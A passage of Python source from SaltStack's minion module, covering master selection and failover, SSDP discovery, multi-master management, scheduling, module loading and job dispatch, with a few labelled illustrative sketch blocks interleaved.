'{0}_{1}'.format(event_map.get(type), master) return event_map.get(type, None) def service_name(): ''' Return the proper service name based on platform ''' return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion' class MinionBase(object): def __init__(self, opts): self.opts = opts @staticmethod def process_schedule(minion, loop_interval): try: if hasattr(minion, 'schedule'): minion.schedule.eval() else: log.error('Minion scheduler not initialized. Scheduled jobs will not be run.') return # Check if scheduler requires lower loop interval than # the loop_interval setting if minion.schedule.loop_interval < loop_interval: loop_interval = minion.schedule.loop_interval log.debug( 'Overriding loop_interval because of scheduled jobs.' 
) except Exception as exc: log.error('Exception %s occurred in scheduled job', exc) return loop_interval def process_beacons(self, functions): ''' Evaluate all of the configured beacons, grab the config again in case the pillar or grains changed ''' if 'config.merge' in functions: b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True) if b_conf: return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member return [] @tornado.gen.coroutine def eval_master(self, opts, timeout=60, safe=True, failed=False, failback=False): ''' Evaluates and returns a tuple of the current master address and the pub_channel. In standard mode, just creates a pub_channel with the given master address. With master_type=func evaluates the current master address from the given module and then creates a pub_channel. With master_type=failover takes the list of masters and loops through them. The first one that allows the minion to create a pub_channel is then returned. If this function is called outside the minions initialization phase (for example from the minions main event-loop when a master connection loss was detected), 'failed' should be set to True. The current (possibly failed) master will then be removed from the list of masters. ''' # return early if we are not connecting to a master if opts['master_type'] == 'disable': log.warning('Master is set to disable, skipping connection') self.connected = False raise tornado.gen.Return((None, None)) # Run masters discovery over SSDP. This may modify the whole configuration, # depending of the networking and sets of masters. # if we are using multimaster, discovery can only happen at start time # because MinionManager handles it. by eval_master time the minion doesn't # know about other siblings currently running if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'): self._discover_masters() # check if master_type was altered from its default if opts['master_type'] != 'str' and opts['__role'] != 'syndic': # check for a valid keyword if opts['master_type'] == 'func': eval_master_func(opts) # if failover or distributed is set, master has to be of type list elif opts['master_type'] in ('failover', 'distributed'): if isinstance(opts['master'], list): log.info( 'Got list of available master addresses: %s', opts['master'] ) if opts['master_type'] == 'distributed': master_len = len(opts['master']) if master_len > 1: secondary_masters = opts['master'][1:] master_idx = crc32(opts['id']) % master_len try: preferred_masters = opts['master'] preferred_masters[0] = opts['master'][master_idx] preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]] opts['master'] = preferred_masters log.info('Distributed to the master at \'%s\'.', opts['master'][0]) except (KeyError, AttributeError, TypeError): log.warning('Failed to distribute to a specific master.') else: log.warning('master_type = distributed needs more than 1 master.') if opts['master_shuffle']: log.warning( 'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor ' 'of \'random_master\'. Please update your minion config file.' 
) opts['random_master'] = opts['master_shuffle'] opts['auth_tries'] = 0 if opts['master_failback'] and opts['master_failback_interval'] == 0: opts['master_failback_interval'] = opts['master_alive_interval'] # if opts['master'] is a str and we have never created opts['master_list'] elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts): # We have a string, but a list was what was intended. Convert. # See issue 23611 for details opts['master'] = [opts['master']] elif opts['__role'] == 'syndic': log.info('Syndic setting master_syndic to \'%s\'', opts['master']) # if failed=True, the minion was previously connected # we're probably called from the minions main-event-loop # because a master connection loss was detected. remove # the possibly failed master from the list of masters. elif failed: if failback: # failback list of masters to original config opts['master'] = opts['master_list'] else: log.info( 'Moving possibly failed master %s to the end of ' 'the list of masters', opts['master'] ) if opts['master'] in opts['local_masters']: # create new list of master with the possibly failed # one moved to the end failed_master = opts['master'] opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x] opts['master'].append(failed_master) else: opts['master'] = opts['master_list'] else: msg = ('master_type set to \'failover\' but \'master\' ' 'is not of type list but of type ' '{0}'.format(type(opts['master']))) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # If failover is set, minion have to failover on DNS errors instead of retry DNS resolve. # See issue 21082 for details if opts['retry_dns'] and opts['master_type'] == 'failover': msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. ' 'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.') log.critical(msg) opts['retry_dns'] = 0 else: msg = ('Invalid keyword \'{0}\' for variable ' '\'master_type\''.format(opts['master_type'])) log.error(msg) sys.exit(salt.defaults.exitcodes.EX_GENERIC) # FIXME: if SMinion don't define io_loop, it can't switch master see #29088 # Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop # (The channel factories will set a default if the kwarg isn't passed) factory_kwargs = {'timeout': timeout, 'safe': safe} if getattr(self, 'io_loop', None): factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member tries = opts.get('master_tries', 1) attempts = 0 # if we have a list of masters, loop through them and be # happy with the first one that allows us to connect if isinstance(opts['master'], list): conn = False last_exc = None opts['master_uri_list'] = [] opts['local_masters'] = copy.copy(opts['master']) # shuffle the masters and then loop through them if opts['random_master']: # master_failback is only used when master_type is set to failover if opts['master_type'] == 'failover' and opts['master_failback']: secondary_masters = opts['local_masters'][1:] shuffle(secondary_masters) opts['local_masters'][1:] = secondary_masters else: shuffle(opts['local_masters']) # This sits outside of the connection loop below because it needs to set # up a list of master URIs regardless of which masters are available # to connect _to_. This is primarily used for masterless mode, when # we need a list of master URIs to fire calls back to. 
for master in opts['local_masters']: opts['master'] = master opts.update(prep_ip_port(opts)) opts['master_uri_list'].append(resolve_dns(opts)['master_uri']) while True: if attempts != 0: # Give up a little time between connection attempts # to allow the IOLoop to run any other scheduled tasks. yield tornado.gen.sleep(opts['acceptance_wait_time']) attempts += 1 if tries > 0: log.debug( 'Connecting to master. Attempt %s of %s', attempts, tries ) else: log.debug( 'Connecting to master. Attempt %s (infinite attempts)', attempts ) for master in opts['local_masters']: opts['master'] = master opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) # on first run, update self.opts with the whole master list # to enable a minion to re-use old masters if they get fixed if 'master_list' not in opts: opts['master_list'] = copy.copy(opts['local_masters']) self.opts = opts pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs) try: yield pub_channel.connect() conn = True break except SaltClientError as exc: last_exc = exc if exc.strerror.startswith('Could not access'): msg = ( 'Failed to initiate connection with Master ' '%s: check ownership/permissions. Error ' 'message: %s', opts['master'], exc ) else: msg = ('Master %s could not be reached, trying next ' 'next master (if any)', opts['master']) log.info(msg) continue if not conn: if attempts == tries: # Exhausted all attempts. Return exception. self.connected = False self.opts['master'] = copy.copy(self.opts['local_masters']) log.error( 'No master could be reached or all masters ' 'denied the minion\'s connection attempt.' ) # If the code reaches this point, 'last_exc' # should already be set. raise last_exc # pylint: disable=E0702 else: self.tok = pub_channel.auth.gen_token(b'salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) # single master sign in else: if opts['random_master']: log.warning('random_master is True but there is only one master specified. Ignoring.') while True: if attempts != 0: # Give up a little time between connection attempts # to allow the IOLoop to run any other scheduled tasks. yield tornado.gen.sleep(opts['acceptance_wait_time']) attempts += 1 if tries > 0: log.debug( 'Connecting to master. Attempt %s of %s', attempts, tries ) else: log.debug( 'Connecting to master. Attempt %s (infinite attempts)', attempts ) opts.update(prep_ip_port(opts)) opts.update(resolve_dns(opts)) try: if self.opts['transport'] == 'detect': self.opts['detect_mode'] = True for trans in ('zeromq', 'tcp'): if trans == 'zeromq' and not zmq: continue self.opts['transport'] = trans pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs) yield pub_channel.connect() if not pub_channel.auth.authenticated: continue del self.opts['detect_mode'] break else: pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs) yield pub_channel.connect() self.tok = pub_channel.auth.gen_token(b'salt') self.connected = True raise tornado.gen.Return((opts['master'], pub_channel)) except SaltClientError as exc: if attempts == tries: # Exhausted all attempts. Return exception. self.connected = False raise exc def _discover_masters(self): ''' Discover master(s) and decide where to connect, if SSDP is around. This modifies the configuration on the fly. 
:return: ''' if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False: master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient() masters = {} for att in range(self.opts['discovery'].get('attempts', 3)): try: att += 1 log.info('Attempting %s time(s) to discover masters', att) masters.update(master_discovery_client.discover()) if not masters: time.sleep(self.opts['discovery'].get('pause', 5)) else: break except Exception as err: log.error('SSDP discovery failure: %s', err) break if masters: policy = self.opts.get('discovery', {}).get('match', 'any') if policy not in ['any', 'all']: log.error('SSDP configuration matcher failure: unknown value "%s". ' 'Should be "any" or "all"', policy) return mapping = self.opts['discovery'].get('mapping', {}) discovered = [] for addr, mappings in masters.items(): for proto_data in mappings: cnt = len([key for key, value in mapping.items() if proto_data.get('mapping', {}).get(key) == value]) if policy == 'any' and bool(cnt) or cnt == len(mapping): if self.opts['discovery'].get('multimaster'): discovered.append(proto_data['master']) else: self.opts['master'] = proto_data['master'] return self.opts['master'] = discovered def _return_retry_timer(self): ''' Based on the minion configuration, either return a randomized timer or just return the value of the return_retry_timer. ''' msg = 'Minion return retry timer set to %s seconds' if self.opts.get('return_retry_timer_max'): try: random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max']) retry_msg = msg % random_retry log.debug('%s (randomized)', msg % random_retry) return random_retry except ValueError: # Catch wiseguys using negative integers here log.error( 'Invalid value (return_retry_timer: %s or ' 'return_retry_timer_max: %s). Both must be positive ' 'integers.', self.opts['return_retry_timer'], self.opts['return_retry_timer_max'], ) log.debug(msg, DEFAULT_MINION_OPTS['return_retry_timer']) return DEFAULT_MINION_OPTS['return_retry_timer'] else: log.debug(msg, self.opts.get('return_retry_timer')) return self.opts.get('return_retry_timer') class SMinion(MinionBase): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. The SMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. 
''' def __init__(self, opts): # Late setup of the opts grains, so we can log from the grains module import salt.loader opts['grains'] = salt.loader.grains(opts) super(SMinion, self).__init__(opts) # run ssdp discovery if necessary self._discover_masters() # Clean out the proc directory (default /var/cache/salt/minion/proc) if (self.opts.get('file_client', 'remote') == 'remote' or self.opts.get('use_master_when_local', False)): install_zmq() io_loop = ZMQDefaultLoop.current() io_loop.run_sync( lambda: self.eval_master(self.opts, failed=True) ) self.gen_modules(initial_load=True) # If configured, cache pillar data on the minion if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False): import salt.utils.yaml pdir = os.path.join(self.opts['cachedir'], 'pillar') if not os.path.isdir(pdir): os.makedirs(pdir, 0o700) ptop = os.path.join(pdir, 'top.sls') if self.opts['saltenv'] is not None: penv = self.opts['saltenv'] else: penv = 'base' cache_top = {penv: {self.opts['id']: ['cache']}} with salt.utils.files.fopen(ptop, 'wb') as fp_: salt.utils.yaml.safe_dump(cache_top, fp_) os.chmod(ptop, 0o600) cache_sls = os.path.join(pdir, 'cache.sls') with salt.utils.files.fopen(cache_sls, 'wb') as fp_: salt.utils.yaml.safe_dump(self.opts['pillar'], fp_) os.chmod(cache_sls, 0o600) def gen_modules(self, initial_load=False): ''' Tell the minion to reload the execution modules CLI Example: .. code-block:: bash salt '*' sys.reload_modules ''' self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['saltenv'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods(self.opts, utils=self.utils) self.serializers = salt.loader.serializers(self.opts) self.returners = salt.loader.returners(self.opts, self.functions) self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None) # TODO: remove self.function_errors = {} # Keep the funcs clean self.states = salt.loader.states(self.opts, self.functions, self.utils, self.serializers) self.rend = salt.loader.render(self.opts, self.functions) # self.matcher = Matcher(self.opts, self.functions) self.matchers = salt.loader.matchers(self.opts) self.functions['sys.reload_modules'] = self.gen_modules self.executors = salt.loader.executors(self.opts) class MasterMinion(object): ''' Create a fully loaded minion function object for generic use on the master. What makes this class different is that the pillar is omitted, otherwise everything else is loaded cleanly. ''' def __init__( self, opts, returners=True, states=True, rend=True, matcher=True, whitelist=None, ignore_config_errors=True): self.opts = salt.config.minion_config( opts['conf_file'], ignore_config_errors=ignore_config_errors, role='master' ) self.opts.update(opts) self.whitelist = whitelist self.opts['grains'] = salt.loader.grains(opts) self.opts['pillar'] = {} self.mk_returners = returners self.mk_states = states self.mk_rend = rend self.mk_matcher = matcher self.gen_modules(initial_load=True) def gen_modules(self, initial_load=False): ''' Tell the minion to reload the execution modules CLI Example: .. 
code-block:: bash salt '*' sys.reload_modules ''' self.utils = salt.loader.utils(self.opts) self.functions = salt.loader.minion_mods( self.opts, utils=self.utils, whitelist=self.whitelist, initial_load=initial_load) self.serializers = salt.loader.serializers(self.opts) if self.mk_returners: self.returners = salt.loader.returners(self.opts, self.functions) if self.mk_states: self.states = salt.loader.states(self.opts, self.functions, self.utils, self.serializers) if self.mk_rend: self.rend = salt.loader.render(self.opts, self.functions) if self.mk_matcher: self.matchers = salt.loader.matchers(self.opts) self.functions['sys.reload_modules'] = self.gen_modules class MinionManager(MinionBase): ''' Create a multi minion interface, this creates as many minions as are defined in the master option and binds each minion object to a respective master. ''' def __init__(self, opts): super(MinionManager, self).__init__(opts) self.auth_wait = self.opts['acceptance_wait_time'] self.max_auth_wait = self.opts['acceptance_wait_time_max'] self.minions = [] self.jid_queue = [] install_zmq() self.io_loop = ZMQDefaultLoop.current() self.process_manager = ProcessManager(name='MultiMinionProcessManager') self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat def __del__(self): self.destroy() def _bind(self): # start up the event publisher, so we can see events during startup self.event_publisher = salt.utils.event.AsyncEventPublisher( self.opts, io_loop=self.io_loop, ) self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop) self.event.subscribe('') self.event.set_event_handler(self.handle_event) @tornado.gen.coroutine def handle_event(self, package): yield [minion.handle_event(package) for minion in self.minions] def _create_minion_object(self, opts, timeout, safe, io_loop=None, loaded_base_name=None, jid_queue=None): ''' Helper function to return the correct type of object ''' return Minion(opts, timeout, safe, io_loop=io_loop, loaded_base_name=loaded_base_name, jid_queue=jid_queue) def _check_minions(self): ''' Check the size of self.minions and raise an error if it's empty ''' if not self.minions: err = ('Minion unable to successfully connect to ' 'a Salt Master.') log.error(err) def _spawn_minions(self, timeout=60): ''' Spawn all the coroutines which will sign in to masters ''' # Run masters discovery over SSDP. This may modify the whole configuration, # depending of the networking and sets of masters. 
If match is 'any' we let # eval_master handle the discovery instead so disconnections can also handle # discovery if isinstance(self.opts['discovery'], dict) and self.opts['discovery'].get('multimaster'): self._discover_masters() masters = self.opts['master'] if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list): masters = [masters] for master in masters: s_opts = copy.deepcopy(self.opts) s_opts['master'] = master s_opts['multimaster'] = True minion = self._create_minion_object(s_opts, s_opts['auth_timeout'], False, io_loop=self.io_loop, loaded_base_name='salt.loader.{0}'.format(s_opts['master']), jid_queue=self.jid_queue) self.io_loop.spawn_callback(self._connect_minion, minion) self.io_loop.call_later(timeout, self._check_minions) @tornado.gen.coroutine def _connect_minion(self, minion): ''' Create a minion, and asynchronously connect it to a master ''' auth_wait = minion.opts['acceptance_wait_time'] failed = False while True: if failed: if auth_wait < self.max_auth_wait: auth_wait += self.auth_wait log.debug( "sleeping before reconnect attempt to %s [%d/%d]", minion.opts['master'], auth_wait, self.max_auth_wait, ) yield tornado.gen.sleep(auth_wait) # TODO: log? try: if minion.opts.get('beacons_before_connect', False): minion.setup_beacons(before_connect=True) if minion.opts.get('scheduler_before_connect', False): minion.setup_scheduler(before_connect=True) yield minion.connect_master(failed=failed) minion.tune_in(start=False) self.minions.append(minion) break except SaltClientError as exc: failed = True log.error( 'Error while bringing up minion for multi-master. Is ' 'master at %s responding?', minion.opts['master'] ) except SaltMasterUnresolvableError: err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \ 'Set \'master\' value in minion config.'.format(minion.opts['master']) log.error(err) break except Exception as e: failed = True log.critical( 'Unexpected error while connecting to %s', minion.opts['master'], exc_info=True ) # Multi Master Tune In def tune_in(self): ''' Bind to the masters This loop will attempt to create connections to masters it hasn't connected to yet, but once the initial connection is made it is up to ZMQ to do the reconnect (don't know of an API to get the state here in salt) ''' self._bind() # Fire off all the minion coroutines self._spawn_minions() # serve forever! self.io_loop.start() @property def restart(self): for minion in self.minions: if minion.restart: return True return False def stop(self, signum): for minion in self.minions: minion.process_manager.stop_restarting() minion.process_manager.send_signal_to_processes(signum) # kill any remaining processes minion.process_manager.kill_children() minion.destroy() def destroy(self): for minion in self.minions: minion.destroy() class Minion(MinionBase): ''' This class instantiates a minion, runs connections for a minion, and loads all of the functions into the minion ''' def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231 ''' Pass in the options dict ''' # this means that the parent class doesn't know *which* master we connect to super(Minion, self).__init__(opts) self.timeout = timeout self.safe = safe self._running = None self.win_proc = [] self.loaded_base_name = loaded_base_name self.connected = False self.restart = False # Flag meaning minion has finished initialization including first connect to the master. 
# True means the Minion is fully functional and ready to handle events. self.ready = False self.jid_queue = [] if jid_queue is None else jid_queue self.periodic_callbacks = {} if io_loop is None: install_zmq() self.io_loop = ZMQDefaultLoop.current() else: self.io_loop = io_loop # Warn if ZMQ < 3.2 if zmq: if ZMQ_VERSION_INFO < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) # Late setup of the opts grains, so we can log from the grains # module. If this is a proxy, however, we need to init the proxymodule # before we can get the grains. We do this for proxies in the # post_master_init if not salt.utils.platform.is_proxy(): self.opts['grains'] = salt.loader.grains(opts) else: if self.opts.get('beacons_before_connect', False): log.warning( '\'beacons_before_connect\' is not supported ' 'for proxy minions. Setting to False' ) self.opts['beacons_before_connect'] = False if self.opts.get('scheduler_before_connect', False): log.warning( '\'scheduler_before_connect\' is not supported ' 'for proxy minions. Setting to False' ) self.opts['scheduler_before_connect'] = False log.info('Creating minion process manager') if self.opts['random_startup_delay']: sleep_time = random.randint(0, self.opts['random_startup_delay']) log.info( 'Minion sleeping for %s seconds due to configured ' 'startup_delay between 0 and %s seconds', sleep_time, self.opts['random_startup_delay'] ) time.sleep(sleep_time) self.process_manager = ProcessManager(name='MinionProcessManager') self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # We don't have the proxy setup yet, so we can't start engines # Engines need to be able to access __proxy__ if not salt.utils.platform.is_proxy(): self.io_loop.spawn_callback(salt.engines.start_engines, self.opts, self.process_manager) # Install the SIGINT/SIGTERM handlers if not done so far if signal.getsignal(signal.SIGINT) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGINT, self._handle_signals) if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL: # No custom signal handling was added, install our own signal.signal(signal.SIGTERM, self._handle_signals) def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument self._running = False # escalate the signals to the process manager self.process_manager.stop_restarting() self.process_manager.send_signal_to_processes(signum) # kill any remaining processes self.process_manager.kill_children() time.sleep(1) sys.exit(0) def sync_connect_master(self, timeout=None, failed=False): ''' Block until we are connected to a master ''' self._sync_connect_master_success = False log.debug("sync_connect_master") def on_connect_master_future_done(future): self._sync_connect_master_success = True self.io_loop.stop() self._connect_master_future = self.connect_master(failed=failed) # finish connecting to master self._connect_master_future.add_done_callback(on_connect_master_future_done) if timeout: self.io_loop.call_later(timeout, self.io_loop.stop) try: self.io_loop.start() except KeyboardInterrupt: self.destroy() # I made the following 3 line oddity to preserve traceback. # Please read PR #23978 before changing, hopefully avoiding regressions. # Good luck, we're all counting on you. Thanks. 
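# --- Illustrative sketch, not part of the original module ---
# The re-raise in sync_connect_master() below exists to preserve the traceback of a
# failed connect future (see the PR reference in the comment above). A minimal,
# self-contained sketch of that general pattern with six.reraise(), assuming a full
# (type, value, traceback) triple has been captured; the helper names `_fail` and
# `demo_reraise` are made up for the example.
import sys
import six


def _fail():
    raise ValueError('boom')


def demo_reraise():
    try:
        _fail()
    except ValueError:
        exc_info = sys.exc_info()      # capture (type, value, traceback)
    # Re-raising later with the captured triple keeps the traceback pointing at
    # _fail(), unlike a bare `raise exc` from a new frame.
    six.reraise(*exc_info)
# --- end sketch ---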
if self._connect_master_future.done(): future_exception = self._connect_master_future.exception() if future_exception: # This needs to be re-raised to preserve restart_on_error behavior. raise six.reraise(*future_exception) if timeout and self._sync_connect_master_success is False: raise SaltDaemonNotRunning('Failed to connect to the salt-master') @tornado.gen.coroutine def connect_master(self, failed=False): ''' Return a future which will complete when you are connected to a master ''' master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed) yield self._post_master_init(master) # TODO: better name... @tornado.gen.coroutine def _post_master_init(self, master): ''' Function to finish init after connecting to a master This is primarily loading modules, pillars, etc. (since they need to know which master they connected to) If this function is changed, please check ProxyMinion._post_master_init to see if those changes need to be propagated. Minions and ProxyMinions need significantly different post master setups, which is why the differences are not factored out into separate helper functions. ''' if self.connected: self.opts['master'] = master # Initialize pillar before loader to make pillar accessible in modules async_pillar = salt.pillar.get_async_pillar( self.opts, self.opts['grains'], self.opts['id'], self.opts['saltenv'], pillarenv=self.opts.get('pillarenv') ) self.opts['pillar'] = yield async_pillar.compile_pillar() async_pillar.destroy() if not self.ready: self._setup_core() elif self.connected and self.opts['pillar']: # The pillar has changed due to the connection to the master. # Reload the functions so that they can use the new pillar data. self.functions, self.returners, self.function_errors, self.executors = self._load_modules() if hasattr(self, 'schedule'): self.schedule.functions = self.functions self.schedule.returners = self.returners if not hasattr(self, 'schedule'): self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners, cleanup=[master_event(type='alive')]) # add default scheduling jobs to the minions scheduler if self.opts['mine_enabled'] and 'mine.update' in self.functions: self.schedule.add_job({ '__mine_interval': { 'function': 'mine.update', 'minutes': self.opts['mine_interval'], 'jid_include': True, 'maxrunning': 2, 'run_on_start': True, 'return_job': self.opts.get('mine_return_job', False) } }, persist=True) log.info('Added mine.update to scheduler') else: self.schedule.delete_job('__mine_interval', persist=True) # add master_alive job if enabled if (self.opts['transport'] != 'tcp' and self.opts['master_alive_interval'] > 0 and self.connected): self.schedule.add_job({ master_event(type='alive', master=self.opts['master']): { 'function': 'status.master', 'seconds': self.opts['master_alive_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master'], 'connected': True} } }, persist=True) if self.opts['master_failback'] and \ 'master_list' in self.opts and \ self.opts['master'] != self.opts['master_list'][0]: self.schedule.add_job({ master_event(type='failback'): { 'function': 'status.ping_master', 'seconds': self.opts['master_failback_interval'], 'jid_include': True, 'maxrunning': 1, 'return_job': False, 'kwargs': {'master': self.opts['master_list'][0]} } }, persist=True) else: self.schedule.delete_job(master_event(type='failback'), persist=True) else: self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True) 
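# --- Illustrative sketch, not part of the original module ---
# The add_job()/delete_job() calls in _post_master_init() above operate on plain
# dictionaries keyed by a job name (the name comes from master_event(type='alive', ...)
# in the real code). The shape below mirrors the master-alive entry added above; the
# literal key and master address are made-up placeholders.
example_alive_job = {
    '__example_master_alive_key': {
        'function': 'status.master',   # execution module function to run
        'seconds': 30,                 # master_alive_interval from the minion config
        'jid_include': True,
        'maxrunning': 1,               # never stack overlapping runs
        'return_job': False,           # do not publish a job return for this check
        'kwargs': {'master': 'salt.example.com', 'connected': True},
    }
}
# --- end sketch ---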
self.schedule.delete_job(master_event(type='failback'), persist=True) def _prep_mod_opts(self): ''' Returns a copy of the opts with key bits stripped out ''' mod_opts = {} for key, val in six.iteritems(self.opts): if key == 'logger': continue mod_opts[key] = val return mod_opts def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None): ''' Return the functions and the returners loaded up from the loader module ''' opt_in = True if not opts: opts = self.opts opt_in = False # if this is a *nix system AND modules_max_memory is set, lets enforce # a memory limit on module imports # this feature ONLY works on *nix like OSs (resource module doesn't work on windows) modules_max_memory = False if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE: log.debug( 'modules_max_memory set, enforcing a maximum of %s', opts['modules_max_memory'] ) modules_max_memory = True old_mem_limit = resource.getrlimit(resource.RLIMIT_AS) rss, vms = psutil.Process(os.getpid()).memory_info()[:2] mem_limit = rss + vms + opts['modules_max_memory'] resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit)) elif opts.get('modules_max_memory', -1) > 0: if not HAS_PSUTIL: log.error('Unable to enforce modules_max_memory because psutil is missing') if not HAS_RESOURCE: log.error('Unable to enforce modules_max_memory because resource is missing') # This might be a proxy minion if hasattr(self, 'proxy'): proxy = self.proxy else: proxy = None if grains is None: opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy) self.utils = salt.loader.utils(opts, proxy=proxy) if opts.get('multimaster', False): s_opts = copy.deepcopy(opts) functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy, loaded_base_name=self.loaded_base_name, notify=notify) else: functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy) returners = salt.loader.returners(opts, functions, proxy=proxy) errors = {} if '_errors' in functions: errors = functions['_errors'] functions.pop('_errors') # we're done, reset the limits! if modules_max_memory is True: resource.setrlimit(resource.RLIMIT_AS, old_mem_limit) executors = salt.loader.executors(opts, functions, proxy=proxy) if opt_in: self.opts = opts return functions, returners, errors, executors def _send_req_sync(self, load, timeout): if self.opts['minion_sign_messages']: log.trace('Signing event to be published onto the bus.') minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem') sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load)) load['sig'] = sig channel = salt.transport.client.ReqChannel.factory(self.opts) try: return channel.send(load, timeout=timeout) finally: channel.close() @tornado.gen.coroutine def _send_req_async(self, load, timeout): if self.opts['minion_sign_messages']: log.trace('Signing event to be published onto the bus.') minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem') sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load)) load['sig'] = sig channel = salt.transport.client.AsyncReqChannel.factory(self.opts) try: ret = yield channel.send(load, timeout=timeout) raise tornado.gen.Return(ret) finally: channel.close() def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None): ''' Fire an event on the master, or drop message if unable to send. 
''' load = {'id': self.opts['id'], 'cmd': '_minion_event', 'pretag': pretag, 'tok': self.tok} if events: load['events'] = events elif data and tag: load['data'] = data load['tag'] = tag elif not data and tag: load['data'] = {} load['tag'] = tag else: return if sync: try: self._send_req_sync(load, timeout) except salt.exceptions.SaltReqTimeoutError: log.info('fire_master failed: master could not be contacted. Request timed out.') # very likely one of the masters is dead, status.master will flush it self.functions['status.master'](self.opts['master']) return False except Exception: log.info('fire_master failed: %s', traceback.format_exc()) return False else: if timeout_handler is None: def handle_timeout(*_): log.info('fire_master failed: master could not be contacted. Request timed out.') # very likely one of the masters is dead, status.master will flush it self.functions['status.master'](self.opts['master']) return True timeout_handler = handle_timeout with tornado.stack_context.ExceptionStackContext(timeout_handler): self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg return True @tornado.gen.coroutine def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' # Ensure payload is unicode. Disregard failure to decode binary blobs. if six.PY2: data = salt.utils.data.decode(data, keep=True) if 'user' in data: log.info( 'User %s Executing command %s with jid %s', data['user'], data['fun'], data['jid'] ) else: log.info( 'Executing command %s with jid %s', data['fun'], data['jid'] ) log.debug('Command details %s', data) # Don't duplicate jobs log.trace('Started JIDs: %s', self.jid_queue) if self.jid_queue is not None: if data['jid'] in self.jid_queue: return else: self.jid_queue.append(data['jid']) if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']: self.jid_queue.pop(0) if isinstance(data['fun'], six.string_types): if data['fun'] == 'sys.reload_modules': self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.schedule.functions = self.functions self.schedule.returners = self.returners process_count_max = self.opts.get('process_count_max') if process_count_max > 0: process_count = len(salt.utils.minion.running(self.opts)) while process_count >= process_count_max: log.warning("Maximum number of processes reached while executing jid %s, waiting...", data['jid']) yield tornado.gen.sleep(10) process_count = len(salt.utils.minion.running(self.opts)) # We stash an instance references to allow for the socket # communication in Windows. You can't pickle functions, and thus # python needs to be able to reconstruct the reference on the other # side. instance = self multiprocessing_enabled = self.opts.get('multiprocessing', True) if multiprocessing_enabled: if sys.platform.startswith('win'): # let python reconstruct the minion on the other side if we're # running on windows instance = None with default_signals(signal.SIGINT, signal.SIGTERM): process = SignalHandlingMultiprocessingProcess( target=self._target, args=(instance, self.opts, data, self.connected) ) else: process = threading.Thread( target=self._target, args=(instance, self.opts, data, self.connected), name=data['jid'] ) if multiprocessing_enabled: with default_signals(signal.SIGINT, signal.SIGTERM): # Reset current signals before starting the process in # order not to inherit the current signal handlers process.start() else: process.start() # TODO: remove the windows specific check? 
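# --- Illustrative sketch, not part of the original module ---
# The jid_queue handling in _handle_decoded_payload() above is a bounded
# de-duplication window: skip jobs already seen, remember new ones, and drop the
# oldest entry once the high-water mark is reached. Stand-alone version of that
# bookkeeping; the helper name `seen_before` is hypothetical.
def seen_before(jid, jid_queue, hwm):
    '''Return True if this jid was already handled; otherwise record it and
    trim the oldest entry when the queue exceeds the high-water mark.'''
    if jid in jid_queue:
        return True
    jid_queue.append(jid)
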